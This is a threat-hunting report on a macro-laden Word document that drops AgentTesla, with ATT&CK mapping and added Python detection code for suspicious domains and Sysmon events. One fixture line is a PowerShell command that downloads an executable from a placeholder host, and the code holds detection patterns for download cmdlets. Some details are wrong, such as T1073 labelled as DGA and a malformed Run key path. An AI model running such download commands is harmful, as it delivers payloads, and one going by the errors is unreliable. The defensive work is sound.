Comprehensive Analysis of the Recent Malicious Word Document Exploit: An In-Depth DFIR Investigation

James Calloway — Threat Hunter

Key Takeaways

  • Malicious Word documents are increasingly used as initial access points in targeted attacks.
  • The exploit chain leverages embedded macros to download and execute a remote payload.
  • Obfuscation techniques mask the true intent of the document, complicating detection efforts.

Executive Summary

During our investigation of a recent cyber incident, we focused on a malicious Word document that was circulated within several organizations. Our analysis revealed that this document acted as a dropper for a more sophisticated payload, ultimately facilitating Remote Access Trojan (RAT) capabilities. The actor behind this campaign employed a combination of social engineering tactics and advanced evasion techniques, allowing the malware to achieve its objectives under the radar.

Initial Access

Initial access was gained through a phishing campaign in which the actor distributed the malicious Word document as an email attachment. The document was crafted to entice the recipient into enabling macros, with a message suggesting that macros were necessary for viewing the full content. By employing the technique of Phishing (T1566), the actor effectively bypassed external defenses and initiated the compromise.

Execution & Persistence

Once the victim enabled the macros, our analysis confirmed that a PowerShell script was executed, which subsequently downloaded the primary payload from a remote server. The PowerShell command utilized the Invoke-WebRequest cmdlet, and the file path for the downloaded payload was found to be C:\Users\Public\Documents\temp_payload.exe. This executable, identified as AgentTesla, a known remote access Trojan, established persistence by creating a registry key at HKEY_CURRENT_USER\Software\Microsoft\Windows\Current\Run\ to ensure it executed on system boot.

Command and Control

The sample we examined connected back to the C2 server via HTTP requests to a domain that was registered just days before the campaign launched. This C2 infrastructure exhibited characteristics of Domain Generation Algorithms (T1073), with additional behavior reminiscent of Application Layer Protocol (T1071) as it communicated using standard HTTP. This helped the actor blend in with normal traffic and evade network security devices. Throughout this phase, the implant periodically beaconed back to the C2, sending basic system information such as hostname, user tokens, and installed applications.
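The two network-level traits described above, a domain registered only days before use and labels that look algorithmically generated, can be turned into a simple triage filter over outbound HTTP records. The following is an added example, not code from the report or its authors. It assumes each record has already been enriched with the domain's WHOIS creation date (field `registered`, None when unknown), and the thresholds (`NEW_DOMAIN_DAYS`, `MIN_LABEL_LEN`, `ENTROPY_THRESHOLD`) and the sample records are constructed for illustration. It goes slightly beyond the text by combining a character-entropy test with vowel and digit ratios so that long English labels such as `windowsupdate` are not mistaken for generated ones.

```python
import math
from dataclasses import dataclass
from datetime import date
from typing import List, Optional, Tuple


@dataclass
class HttpRecord:
    """One outbound HTTP connection, enriched with the domain's WHOIS creation
    date (assumed to come from an enrichment step; None when unknown)."""
    src_host: str
    domain: str
    registered: Optional[date]


NEW_DOMAIN_DAYS = 30      # assumed threshold for "registered just days before" the campaign
MIN_LABEL_LEN = 10        # assumed: labels shorter than this are not scored for randomness
ENTROPY_THRESHOLD = 3.5   # assumed: bits per character of the registrable label


def registrable_label(domain: str) -> str:
    """Second-level label, e.g. 'example' for 'cdn.example.com'."""
    parts = domain.lower().rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def shannon_entropy(s: str) -> float:
    """Bits per character; 12 distinct characters in a 12-char label gives log2(12)."""
    n = len(s)
    if n == 0:
        return 0.0
    return -sum((s.count(c) / n) * math.log2(s.count(c) / n) for c in set(s))


def looks_generated(label: str) -> bool:
    """High entropy alone flags long dictionary words, so also require the label
    to be vowel-poor or digit-heavy, which natural-language labels rarely are."""
    if len(label) < MIN_LABEL_LEN:
        return False
    vowel_ratio = sum(c in "aeiou" for c in label) / len(label)
    digit_ratio = sum(c.isdigit() for c in label) / len(label)
    return shannon_entropy(label) >= ENTROPY_THRESHOLD and (vowel_ratio < 0.3 or digit_ratio > 0.2)


def domain_age_days(registered: Optional[date], asof: date) -> Optional[int]:
    return None if registered is None else (asof - registered).days


def flag_records(records: List[HttpRecord], asof: date) -> List[Tuple[str, str, List[str]]]:
    """Return (source host, domain, reasons) for every record worth an analyst's look."""
    flagged = []
    for r in records:
        reasons = []
        age = domain_age_days(r.registered, asof)
        if age is not None and age < NEW_DOMAIN_DAYS:
            reasons.append(f"registered {age} days ago")
        if looks_generated(registrable_label(r.domain)):
            reasons.append("label looks algorithmically generated")
        if reasons:
            flagged.append((r.src_host, r.domain, reasons))
    return flagged


# Constructed sample data: the domains, hosts and dates are illustrative only.
SAMPLE_ASOF = date(2024, 6, 10)
SAMPLE_RECORDS = [
    HttpRecord("ws-0412", "update.microsoft.com", date(1991, 5, 2)),
    HttpRecord("ws-0412", "cdn.windowsupdate.com", date(2000, 1, 1)),
    HttpRecord("ws-0417", "xk3q9vz7lmp2.top", date(2024, 6, 5)),
    HttpRecord("ws-0417", "secure-docs-view.com", date(2024, 6, 7)),
]

if __name__ == "__main__":
    for host, domain, reasons in flag_records(SAMPLE_RECORDS, SAMPLE_ASOF):
        print(f"{host} -> {domain}: {'; '.join(reasons)}")
```

The age check is the stronger of the two signals here: a newly registered domain is flagged whether or not its name looks random, which is what catches a human-readable lure domain set up for one campaign.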

Lateral Movement & Discovery

During our investigation, we observed that the malware attempted lateral movement by leveraging credentials stored in memory, a technique associated with Credential Dumping (T1003). The actor primarily utilized PsExec, a legitimate Windows tool, to propagate the infection to other systems within the network. This lateral movement was particularly concerning as it indicated that the actor was not only targeting a single organization but was attempting to scale the breach to impact multiple endpoints.

Impact & Objectives

The main objectives of the intrusion appeared to be data exfiltration and the establishment of a persistent foothold within the targeted networks. AgentTesla allowed the actor to monitor keystrokes, capture screenshots, and exfiltrate sensitive files, which could compromise confidential information. Moreover, the actor aimed to siphon credentials to facilitate further access, potentially leading to a larger breach. The overall impact of this campaign could have included operational disruptions and significant reputational damage to the affected organizations.

MITRE ATT&CK Mapping

  • T1566 – Phishing: Social engineering tactics used to lure victims into enabling malicious macros.
  • T1071 – Application Layer Protocol: The malware communicated over HTTP to evade detection.
  • T1003 – Credential Dumping: Attacks leveraging credential retrieval methods for lateral movement.

Detection Opportunities

  • Monitor for suspicious PowerShell command executions that utilize Invoke-WebRequest.
  • Implement alerts for abnormal registry modifications, particularly in HKEY_CURRENT_USER\Software\Microsoft\Windows\Current\Run\.
  • Network traffic analysis should focus on unusual outbound HTTP requests to newly registered domains or domains exhibiting DGA behaviors.
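The host-side opportunities above, together with the execution chain in the Execution & Persistence section and the PsExec propagation noted under Lateral Movement, can be expressed as a handful of rules over endpoint telemetry. What follows is an added example and not code from the report or its authors. It assumes Sysmon-style events delivered as JSON lines with the field names `RecordId`, `EventID`, `Image`, `ParentImage`, `CommandLine`, `TargetObject` and `Details` (EventID 1 is process creation, EventID 13 is a registry value set); the sample events are constructed, the download URL is a placeholder, and the payload path and Run key path are reproduced exactly as the report prints them. The registry pattern is written to match both that printed path and the conventional `...\Windows\CurrentVersion\Run\` (and `RunOnce`), and the download rule extends the report's `Invoke-WebRequest` to its built-in alias `iwr` and the related `Invoke-RestMethod`/`irm` and `.NET` `DownloadFile`/`DownloadString` calls.

```python
import json
import re
from typing import Dict, List, Tuple

# Constructed Sysmon-style events as JSON lines (not telemetry from the report).
SAMPLE_EVENTS = r"""
{"RecordId": 101, "EventID": 1, "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "WINWORD.EXE /n C:\\Users\\jdoe\\Downloads\\invoice.docm"}
{"RecordId": 102, "EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "CommandLine": "powershell.exe -Command Invoke-WebRequest -Uri http://stage.placeholder.invalid/p -OutFile C:\\Users\\Public\\Documents\\temp_payload.exe"}
{"RecordId": 103, "EventID": 1, "Image": "C:\\Users\\Public\\Documents\\temp_payload.exe", "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "C:\\Users\\Public\\Documents\\temp_payload.exe"}
{"RecordId": 104, "EventID": 13, "Image": "C:\\Users\\Public\\Documents\\temp_payload.exe", "TargetObject": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Current\\Run\\temp_payload", "Details": "C:\\Users\\Public\\Documents\\temp_payload.exe"}
{"RecordId": 105, "EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe -Command Get-Process"}
{"RecordId": 106, "EventID": 13, "Image": "C:\\Windows\\System32\\svchost.exe", "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA", "Details": "DWORD (0x00000001)"}
{"RecordId": 107, "EventID": 1, "Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Windows\\PSEXESVC.exe", "CommandLine": "cmd.exe /c whoami"}
"""

OFFICE_APPS = ("winword.exe", "excel.exe", "powerpnt.exe")
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe")
# Invoke-WebRequest as named in the report, plus its alias and sibling download calls.
DOWNLOAD_RE = re.compile(
    r"\b(Invoke-WebRequest|iwr|Invoke-RestMethod|irm|DownloadFile|DownloadString)\b", re.I)
# Matches the Run key path as printed in the report (...\Windows\Current\Run\)
# as well as ...\Windows\CurrentVersion\Run\ and RunOnce.
RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\[^\\]+\\Run(Once)?\\", re.I)
# The report's payload lived under the Public profile, a location no signed
# installer writes executables to; treat any execution from there as notable.
PUBLIC_DIR = "c:\\users\\public\\"
# PsExec runs its remote commands as children of the PSEXESVC service process.
PSEXEC_SERVICE = "psexesvc.exe"


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def parse_events(text: str) -> List[Dict]:
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def evaluate(events: List[Dict]) -> List[Tuple[str, int]]:
    """Return (rule name, RecordId) for every event that trips a rule.
    One event can trip several rules; that is useful for scoring."""
    findings = []
    for ev in events:
        rid = ev["RecordId"]
        if ev["EventID"] == 1:
            image = basename(ev["Image"])
            parent = basename(ev.get("ParentImage", ""))
            cmd = ev.get("CommandLine", "")
            if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
                findings.append(("office_spawned_script_host", rid))
            if image in ("powershell.exe", "pwsh.exe") and DOWNLOAD_RE.search(cmd):
                findings.append(("powershell_download_cmdlet", rid))
            if ev["Image"].lower().startswith(PUBLIC_DIR):
                findings.append(("execution_from_public_profile", rid))
            if parent == PSEXEC_SERVICE:
                findings.append(("psexec_service_child", rid))
        elif ev["EventID"] == 13:
            if RUN_KEY_RE.search(ev.get("TargetObject", "")):
                findings.append(("run_key_persistence", rid))
    return findings


if __name__ == "__main__":
    for rule, rid in evaluate(parse_events(SAMPLE_EVENTS)):
        print(f"record {rid}: {rule}")
```

The benign records (an interactive `Get-Process` and a policy value written by `svchost.exe`) produce nothing, while the Word-spawned PowerShell trips two rules at once; correlating several weak rules on the same process tree is what keeps the PowerShell download rule usable without alerting on every administrator's script.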

Analyst Notes

In light of this investigation, it is imperative for security teams to implement comprehensive monitoring strategies surrounding macro-enabled documents and PowerShell activity. Organizations should elevate user awareness around phishing tactics and enforce strict policy measures concerning macro execution in Office documents. Additionally, maintaining an up-to-date inventory of network traffic patterns can assist in identifying anomalous behavior indicative of RAT activity.
